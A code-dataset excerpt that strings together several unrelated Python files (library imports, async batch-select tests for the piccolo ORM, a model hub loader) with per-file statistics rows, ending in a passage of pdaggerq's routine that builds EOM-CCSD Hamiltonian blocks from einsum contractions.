_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.77597 | 140 | 0.638648 | 3,975 | 34,977 | 5.351195 | 0.049811 | 0.044756 | 0.056274 | 0.046072 | 0.960651 | 0.957783 | 0.957783 | 0.955949 | 0.954116 | 0.954116 | 0 | 0.0173 | 0.271207 | 34,977 | 798 | 141 | 43.830827 | 0.817151 | 0.326643 | 0 | 0.845972 | 0 | 0 | 0.230096 | 0.071048 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035545 | false | 0 | 0.009479 | 0 | 0.097156 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a63aa0bc9d4ef0d60aaacfdedbd99a2bcc1bcb78 | 258 | py | Python | src/cmarkgfm/__init__.py | waldyrious/cmarkgfm | 21112ab4bd8ff11b9e121472c2eab64ca7de1509 | [
"MIT"
] | null | null | null | src/cmarkgfm/__init__.py | waldyrious/cmarkgfm | 21112ab4bd8ff11b9e121472c2eab64ca7de1509 | [
"MIT"
] | 1 | 2020-04-08T14:28:08.000Z | 2020-04-08T14:28:08.000Z | src/cmarkgfm/__init__.py | waldyrious/cmarkgfm | 21112ab4bd8ff11b9e121472c2eab64ca7de1509 | [
"MIT"
] | 1 | 2020-03-30T15:48:20.000Z | 2020-03-30T15:48:20.000Z | from cmarkgfm.cmark import (
github_flavored_markdown_to_html,
markdown_to_html,
markdown_to_html_with_extensions)
__all__ = [
'github_flavored_markdown_to_html',
'markdown_to_html',
'markdown_to_html_with_extensions',
]
| 21.5 | 40 | 0.736434 | 31 | 258 | 5.354839 | 0.387097 | 0.361446 | 0.506024 | 0.53012 | 0.843373 | 0.843373 | 0.843373 | 0.843373 | 0.843373 | 0.843373 | 0 | 0 | 0.197674 | 258 | 11 | 41 | 23.454545 | 0.801932 | 0 | 0 | 0 | 0 | 0 | 0.323887 | 0.259109 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a67c131d134953ca6b422520cb038388225e850c | 2,462 | py | Python | tests/table/test_batch.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | 1 | 2021-08-22T03:29:08.000Z | 2021-08-22T03:29:08.000Z | tests/table/test_batch.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | tests/table/test_batch.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | import asyncio
import math
from ..base import DBTestCase
from ..example_app.tables import Manager
class TestBatchSelect(DBTestCase):
def _check_results(self, batch):
"""
Make sure the data is returned in the correct format.
"""
self.assertTrue(type(batch) == list)
if len(batch) > 0:
row = batch[0]
self.assertTrue(type(row) == dict)
self.assertTrue("name" in row.keys())
self.assertTrue("id" in row.keys())
async def run_batch(self, batch_size):
row_count = 0
iterations = 0
async with await Manager.select().batch(
batch_size=batch_size
) as batch:
async for _batch in batch:
self._check_results(_batch)
_row_count = len(_batch)
row_count += _row_count
iterations += 1
return row_count, iterations
def test_batch(self):
row_count = 1000
self.insert_many_rows(row_count)
batch_size = 10
_row_count, iterations = asyncio.run(
self.run_batch(batch_size=batch_size), debug=True
)
_iterations = math.ceil(row_count / batch_size)
self.assertTrue(_row_count == row_count)
self.assertTrue(iterations == _iterations)
class TestBatchObjects(DBTestCase):
def _check_results(self, batch):
"""
Make sure the data is returned in the correct format.
"""
self.assertTrue(type(batch) == list)
if len(batch) > 0:
row = batch[0]
self.assertTrue(isinstance(row, Manager))
async def run_batch(self, batch_size):
row_count = 0
iterations = 0
async with await Manager.objects().batch(
batch_size=batch_size
) as batch:
async for _batch in batch:
self._check_results(_batch)
_row_count = len(_batch)
row_count += _row_count
iterations += 1
return row_count, iterations
def test_batch(self):
row_count = 1000
self.insert_many_rows(row_count)
batch_size = 10
_row_count, iterations = asyncio.run(
self.run_batch(batch_size=batch_size), debug=True
)
_iterations = math.ceil(row_count / batch_size)
self.assertTrue(_row_count == row_count)
self.assertTrue(iterations == _iterations)
| 27.355556 | 61 | 0.586515 | 284 | 2,462 | 4.827465 | 0.214789 | 0.128373 | 0.078775 | 0.055434 | 0.841721 | 0.841721 | 0.841721 | 0.841721 | 0.841721 | 0.841721 | 0 | 0.013301 | 0.328188 | 2,462 | 89 | 62 | 27.662921 | 0.815599 | 0.043461 | 0 | 0.774194 | 0 | 0 | 0.0026 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 1 | 0.064516 | false | 0 | 0.064516 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a69ade6877e9ce4ef06cfdc9b9ff0769096f4696 | 231 | py | Python | torch/ao/sparsity/__init__.py | mdmn07C5/pytorch | b14bde466d5d9c5329eff15c07a92dbe96be7b35 | [
"Intel"
] | 1 | 2022-01-25T15:48:31.000Z | 2022-01-25T15:48:31.000Z | torch/ao/sparsity/__init__.py | mdmn07C5/pytorch | b14bde466d5d9c5329eff15c07a92dbe96be7b35 | [
"Intel"
] | null | null | null | torch/ao/sparsity/__init__.py | mdmn07C5/pytorch | b14bde466d5d9c5329eff15c07a92dbe96be7b35 | [
"Intel"
] | null | null | null | # Parametrizations
from .experimental.pruner.parametrization import PruningParametrization
from .experimental.pruner.parametrization import ActivationReconstruction
# Pruner
from .experimental.pruner.base_pruner import BasePruner
| 33 | 73 | 0.878788 | 21 | 231 | 9.619048 | 0.47619 | 0.237624 | 0.326733 | 0.366337 | 0.425743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073593 | 231 | 6 | 74 | 38.5 | 0.943925 | 0.099567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a6d1b33ffe3d99422e8e050f86c0ee900b8b342c | 133 | py | Python | hubconf.py | Ivan1248/FCHarDNet | 5d6926aff93e8a1e1a2c8904975b05c19063914a | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/FCHarDNet | 5d6926aff93e8a1e1a2c8904975b05c19063914a | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/FCHarDNet | 5d6926aff93e8a1e1a2c8904975b05c19063914a | [
"MIT"
] | null | null | null | from ptsemseg.models import get_model
def fc_hardnet_70(n_classes):
return get_model(dict(arch='hardnet'), n_classes=n_classes)
| 26.6 | 63 | 0.796992 | 22 | 133 | 4.5 | 0.681818 | 0.242424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0.105263 | 133 | 4 | 64 | 33.25 | 0.815126 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
5b910ac371c2f76cf6e8712a1c6b711f6bf529c2 | 91,457 | py | Python | examples/psi4_interface/eom_ccsd.py | maxscheurer/pdaggerq | e9fef3466e0d0170afc3094ab79e603200e78dfb | [
"Apache-2.0"
] | 37 | 2020-09-17T19:29:18.000Z | 2022-03-03T16:29:16.000Z | examples/psi4_interface/eom_ccsd.py | maxscheurer/pdaggerq | e9fef3466e0d0170afc3094ab79e603200e78dfb | [
"Apache-2.0"
] | 7 | 2021-02-28T19:22:12.000Z | 2022-02-22T15:17:47.000Z | examples/psi4_interface/eom_ccsd.py | maxscheurer/pdaggerq | e9fef3466e0d0170afc3094ab79e603200e78dfb | [
"Apache-2.0"
] | 6 | 2021-02-16T22:34:29.000Z | 2021-12-04T19:37:23.000Z | # pdaggerq - A code for bringing strings of creation / annihilation operators to normal order.
# Copyright (C) 2020 A. Eugene DePrince III
#
# This file is part of the pdaggerq package.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Functions to build EOM-CCSD Hamiltonian
"""
import numpy as np
from numpy import einsum
def build_eom_ccsd_H_by_block(kd, f, g, o, v, t1, t2):
# H(0;0) = <0| e(-T) H e(T) |0>
# 1.0000 f(i,i)
H00 = 1.000000000000000 * einsum('ii', f[o, o])
# 1.0000 f(i,a)*t1(a,i)
H00 += 1.000000000000000 * einsum('ia,ai', f[o, v], t1)
# -0.5000 <j,i||j,i>
H00 += -0.500000000000000 * einsum('jiji', g[o, o, o, o])
# 0.2500 <j,i||a,b>*t2(a,b,j,i)
H00 += 0.250000000000000 * einsum('jiab,abji', g[o, o, v, v], t2)
# -0.5000 <j,i||a,b>*t1(a,i)*t1(b,j)
H00 += -0.500000000000000 * einsum('jiab,ai,bj', g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# H(m,e;0) = <0|e1(m,e) e(-T) H e(T) |0>
# 1.0000 f(e,m)
Hs0 = 1.000000000000000 * einsum('em->em', f[v, o])
# -1.0000 f(i,m)*t1(e,i)
Hs0 += -1.000000000000000 * einsum('im,ei->em', f[o, o], t1)
# 1.0000 f(e,a)*t1(a,m)
Hs0 += 1.000000000000000 * einsum('ea,am->em', f[v, v], t1)
# -1.0000 f(i,a)*t2(a,e,m,i)
Hs0 += -1.000000000000000 * einsum('ia,aemi->em', f[o, v], t2)
# -1.0000 f(i,a)*t1(a,m)*t1(e,i)
Hs0 += -1.000000000000000 * einsum('ia,am,ei->em', f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 <i,e||a,m>*t1(a,i)
Hs0 += 1.000000000000000 * einsum('ieam,ai->em', g[o, v, v, o], t1)
# -0.5000 <j,i||a,m>*t2(a,e,j,i)
Hs0 += -0.500000000000000 * einsum('jiam,aeji->em', g[o, o, v, o], t2)
# -0.5000 <i,e||a,b>*t2(a,b,m,i)
Hs0 += -0.500000000000000 * einsum('ieab,abmi->em', g[o, v, v, v], t2)
# 1.0000 <j,i||a,b>*t1(a,i)*t2(b,e,m,j)
Hs0 += 1.000000000000000 * einsum('jiab,ai,bemj->em', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
# 0.5000 <j,i||a,b>*t1(a,m)*t2(b,e,j,i)
Hs0 += 0.500000000000000 * einsum('jiab,am,beji->em', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 2), (0, 1)])
# 0.5000 <j,i||a,b>*t1(e,i)*t2(a,b,m,j)
Hs0 += 0.500000000000000 * einsum('jiab,ei,abmj->em', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 2), (0, 1)])
# 1.0000 <j,i||a,m>*t1(a,i)*t1(e,j)
Hs0 += 1.000000000000000 * einsum('jiam,ai,ej->em', g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 <i,e||a,b>*t1(a,i)*t1(b,m)
Hs0 += 1.000000000000000 * einsum('ieab,ai,bm->em', g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 <j,i||a,b>*t1(a,i)*t1(b,m)*t1(e,j)
Hs0 += 1.000000000000000 * einsum('jiab,ai,bm,ej->em', g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
# H(0;i,a) = <0| e(-T) H e(T) e1(a,i)|0>
# 1.0000 f(i,a)
H0s = 1.000000000000000 * einsum('ia->ai', f[o, v])
# -1.0000 <i,j||b,a>*t1(b,j)
H0s += -1.000000000000000 * einsum('ijba,bj->ai', g[o, o, v, v], t1)
# H(m,n,e,f;0) = <0|e2(m,n,f,e) e(-T) H e(T) |0>
# -1.0000 P(m,n)f(i,n)*t2(e,f,m,i)
contracted_intermediate = -1.000000000000000 * einsum('in,efmi->efmn', f[o, o], t2)
Hd0 = 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 1.0000 P(e,f)f(e,a)*t2(a,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('ea,afmn->efmn', f[v, v], t2)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -1.0000 P(m,n)f(i,a)*t1(a,n)*t2(e,f,m,i)
contracted_intermediate = -1.000000000000000 * einsum('ia,an,efmi->efmn', f[o, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -1.0000 P(e,f)f(i,a)*t1(e,i)*t2(a,f,m,n)
contracted_intermediate = -1.000000000000000 * einsum('ia,ei,afmn->efmn', f[o, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# 1.0000 <e,f||m,n>
Hd0 += 1.000000000000000 * einsum('efmn->efmn', g[v, v, o, o])
# 1.0000 P(e,f)<i,e||m,n>*t1(f,i)
contracted_intermediate = 1.000000000000000 * einsum('iemn,fi->efmn', g[o, v, o, o], t1)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# 1.0000 P(m,n)<e,f||a,n>*t1(a,m)
contracted_intermediate = 1.000000000000000 * einsum('efan,am->efmn', g[v, v, v, o], t1)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 0.5000 <j,i||m,n>*t2(e,f,j,i)
Hd0 += 0.500000000000000 * einsum('jimn,efji->efmn', g[o, o, o, o], t2)
# 1.0000 P(m,n)*P(e,f)<i,e||a,n>*t2(a,f,m,i)
contracted_intermediate = 1.000000000000000 * einsum('iean,afmi->efmn', g[o, v, v, o], t2)
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# 0.5000 <e,f||a,b>*t2(a,b,m,n)
Hd0 += 0.500000000000000 * einsum('efab,abmn->efmn', g[v, v, v, v], t2)
# 1.0000 P(m,n)<j,i||a,n>*t1(a,i)*t2(e,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jian,ai,efmj->efmn', g[o, o, v, o], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 0.5000 P(m,n)<j,i||a,n>*t1(a,m)*t2(e,f,j,i)
contracted_intermediate = 0.500000000000000 * einsum('jian,am,efji->efmn', g[o, o, v, o], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -1.0000 P(m,n)*P(e,f)<j,i||a,n>*t1(e,i)*t2(a,f,m,j)
contracted_intermediate = -1.000000000000000 * einsum('jian,ei,afmj->efmn', g[o, o, v, o], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# 1.0000 P(e,f)<i,e||a,b>*t1(a,i)*t2(b,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('ieab,ai,bfmn->efmn', g[o, v, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -1.0000 P(m,n)*P(e,f)<i,e||a,b>*t1(a,n)*t2(b,f,m,i)
contracted_intermediate = -1.000000000000000 * einsum('ieab,an,bfmi->efmn', g[o, v, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# 0.5000 P(e,f)<i,e||a,b>*t1(f,i)*t2(a,b,m,n)
contracted_intermediate = 0.500000000000000 * einsum('ieab,fi,abmn->efmn', g[o, v, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -1.0000 <j,i||m,n>*t1(e,i)*t1(f,j)
Hd0 += -1.000000000000000 * einsum('jimn,ei,fj->efmn', g[o, o, o, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 P(m,n)*P(e,f)<i,e||a,n>*t1(a,m)*t1(f,i)
contracted_intermediate = 1.000000000000000 * einsum('iean,am,fi->efmn', g[o, v, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# -1.0000 <e,f||a,b>*t1(a,n)*t1(b,m)
Hd0 += -1.000000000000000 * einsum('efab,an,bm->efmn', g[v, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# -0.5000 P(m,n)<j,i||a,b>*t2(a,b,n,i)*t2(e,f,m,j)
contracted_intermediate = -0.500000000000000 * einsum('jiab,abni,efmj->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 0.2500 <j,i||a,b>*t2(a,b,m,n)*t2(e,f,j,i)
Hd0 += 0.250000000000000 * einsum('jiab,abmn,efji->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
# -0.5000 <j,i||a,b>*t2(a,e,j,i)*t2(b,f,m,n)
Hd0 += -0.500000000000000 * einsum('jiab,aeji,bfmn->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 P(m,n)<j,i||a,b>*t2(a,e,n,i)*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jiab,aeni,bfmj->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -0.5000 <j,i||a,b>*t2(a,e,m,n)*t2(b,f,j,i)
Hd0 += -0.500000000000000 * einsum('jiab,aemn,bfji->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 2), (0, 1)])
# 1.0000 P(m,n)<j,i||a,b>*t1(a,i)*t1(b,n)*t2(e,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jiab,ai,bn,efmj->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 1.0000 P(e,f)<j,i||a,b>*t1(a,i)*t1(e,j)*t2(b,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('jiab,ai,ej,bfmn->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -0.5000 <j,i||a,b>*t1(a,n)*t1(b,m)*t2(e,f,j,i)
Hd0 += -0.500000000000000 * einsum('jiab,an,bm,efji->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
# 1.0000 P(m,n)*P(e,f)<j,i||a,b>*t1(a,n)*t1(e,i)*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jiab,an,ei,bfmj->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# -0.5000 <j,i||a,b>*t1(e,i)*t1(f,j)*t2(a,b,m,n)
Hd0 += -0.500000000000000 * einsum('jiab,ei,fj,abmn->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
# -1.0000 P(m,n)<j,i||a,n>*t1(a,m)*t1(e,i)*t1(f,j)
contracted_intermediate = -1.000000000000000 * einsum('jian,am,ei,fj->efmn', g[o, o, v, o], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -1.0000 P(e,f)<i,e||a,b>*t1(a,n)*t1(b,m)*t1(f,i)
contracted_intermediate = -1.000000000000000 * einsum('ieab,an,bm,fi->efmn', g[o, v, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# 1.0000 <j,i||a,b>*t1(a,n)*t1(b,m)*t1(e,i)*t1(f,j)
Hd0 += 1.000000000000000 * einsum('jiab,an,bm,ei,fj->efmn', g[o, o, v, v], t1, t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 3), (0, 2), (0, 1)])
# H(0;i,j,a,b) = <0| e(-T) H e(T) e2(a,b,j,i)|0>
# 1.0000 <i,j||a,b>
H0d = 1.000000000000000 * einsum('ijab->abij', g[o, o, v, v])
# H(m,e;i,a) = <0|e1(m,e) e(-T) H e(T) e1(a,i)|0>
# 1.0000 d(e,a)*d(m,i)*f(j,j)
Hss = 1.000000000000000 * einsum('ea,mi,jj->emai', kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 2), (0, 1)])
# -1.0000 d(e,a)*f(i,m)
Hss += -1.000000000000000 * einsum('ea,im->emai', kd[v, v], f[o, o])
# 1.0000 d(m,i)*f(e,a)
Hss += 1.000000000000000 * einsum('mi,ea->emai', kd[o, o], f[v, v])
# 1.0000 d(e,a)*d(m,i)*f(j,b)*t1(b,j)
Hss += 1.000000000000000 * einsum('ea,mi,jb,bj->emai', kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (2, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*f(i,b)*t1(b,m)
Hss += -1.000000000000000 * einsum('ea,ib,bm->emai', kd[v, v], f[o, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(m,i)*f(j,a)*t1(e,j)
Hss += -1.000000000000000 * einsum('mi,ja,ej->emai', kd[o, o], f[o, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -0.5000 d(e,a)*d(m,i)*<k,j||k,j>
Hss += -0.500000000000000 * einsum('ea,mi,kjkj->emai', kd[v, v], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 2), (0, 1)])
# 1.0000 <i,e||a,m>
Hss += 1.000000000000000 * einsum('ieam->emai', g[o, v, v, o])
# 1.0000 d(e,a)*<i,j||b,m>*t1(b,j)
Hss += 1.000000000000000 * einsum('ea,ijbm,bj->emai', kd[v, v], g[o, o, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 <i,j||a,m>*t1(e,j)
Hss += -1.000000000000000 * einsum('ijam,ej->emai', g[o, o, v, o], t1)
# 1.0000 d(m,i)*<j,e||b,a>*t1(b,j)
Hss += 1.000000000000000 * einsum('mi,jeba,bj->emai', kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 <i,e||b,a>*t1(b,m)
Hss += -1.000000000000000 * einsum('ieba,bm->emai', g[o, v, v, v], t1)
# 0.2500 d(e,a)*d(m,i)*<k,j||b,c>*t2(b,c,k,j)
Hss += 0.250000000000000 * einsum('ea,mi,kjbc,bckj->emai', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (2, 3), (0, 2), (0, 1)])
# -0.5000 d(e,a)*<i,j||b,c>*t2(b,c,m,j)
Hss += -0.500000000000000 * einsum('ea,ijbc,bcmj->emai', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -0.5000 d(m,i)*<k,j||b,a>*t2(b,e,k,j)
Hss += -0.500000000000000 * einsum('mi,kjba,bekj->emai', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 <i,j||b,a>*t2(b,e,m,j)
Hss += 1.000000000000000 * einsum('ijba,bemj->emai', g[o, o, v, v], t2)
# -0.5000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t1(c,k)
Hss += -0.500000000000000 * einsum('ea,mi,kjbc,bj,ck->emai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (2, 3), (2, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*<i,j||b,c>*t1(b,j)*t1(c,m)
Hss += 1.000000000000000 * einsum('ea,ijbc,bj,cm->emai', kd[v, v], g[o, o, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(m,i)*<k,j||b,a>*t1(b,j)*t1(e,k)
Hss += 1.000000000000000 * einsum('mi,kjba,bj,ek->emai', kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 <i,j||b,a>*t1(b,m)*t1(e,j)
Hss += 1.000000000000000 * einsum('ijba,bm,ej->emai', g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# H(m,e;i,j,a,b) = <0|e1(m,e) e(-T) H e(T) e2(a,b,j,i)|0>
# -1.0000 d(e,b)*d(m,i)*f(j,a)
Hsd = -1.000000000000000 * einsum('eb,mi,ja->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,b)*d(m,j)*f(i,a)
Hsd += 1.000000000000000 * einsum('eb,mj,ia->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(m,i)*f(j,b)
Hsd += 1.000000000000000 * einsum('ea,mi,jb->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(m,j)*f(i,b)
Hsd += -1.000000000000000 * einsum('ea,mj,ib->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,b)*<i,j||a,m>
Hsd += -1.000000000000000 * einsum('eb,ijam->emabij', kd[v, v], g[o, o, v, o])
# 1.0000 d(e,a)*<i,j||b,m>
Hsd += 1.000000000000000 * einsum('ea,ijbm->emabij', kd[v, v], g[o, o, v, o])
# -1.0000 d(m,i)*<j,e||a,b>
Hsd += -1.000000000000000 * einsum('mi,jeab->emabij', kd[o, o], g[o, v, v, v])
# 1.0000 d(m,j)*<i,e||a,b>
Hsd += 1.000000000000000 * einsum('mj,ieab->emabij', kd[o, o], g[o, v, v, v])
# 1.0000 d(e,b)*d(m,i)*<j,k||c,a>*t1(c,k)
Hsd += 1.000000000000000 * einsum('eb,mi,jkca,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*<i,k||c,a>*t1(c,k)
Hsd += -1.000000000000000 * einsum('eb,mj,ikca,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*<j,k||c,b>*t1(c,k)
Hsd += -1.000000000000000 * einsum('ea,mi,jkcb,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
